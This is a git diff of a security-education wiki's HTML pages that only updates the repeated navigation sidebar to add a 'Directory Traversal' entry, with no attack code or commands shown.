      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Cryptography/Mathematical Prerequisites.html b/docs/Cryptography/Mathematical Prerequisites.html index 045d2128..0a376de9 100644 --- a/docs/Cryptography/Mathematical Prerequisites.html +++ b/docs/Cryptography/Mathematical Prerequisites.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -609,22 +609,6 @@

Distributions - - diff --git a/docs/Cryptography/Primitives/Pseudorandom Function Generators (PRFGs).html b/docs/Cryptography/Primitives/Pseudorandom Function Generators (PRFGs).html index e969fcfa..5d208e1e 100644 --- a/docs/Cryptography/Primitives/Pseudorandom Function Generators (PRFGs).html +++ b/docs/Cryptography/Primitives/Pseudorandom Function Generators (PRFGs).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -277,22 +277,6 @@

PRFGs from PR - - diff --git a/docs/Cryptography/Primitives/Pseudorandom Generators (PRGs).html b/docs/Cryptography/Primitives/Pseudorandom Generators (PRGs).html index 4f90aa1c..351012f0 100644 --- a/docs/Cryptography/Primitives/Pseudorandom Generators (PRGs).html +++ b/docs/Cryptography/Primitives/Pseudorandom Generators (PRGs).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
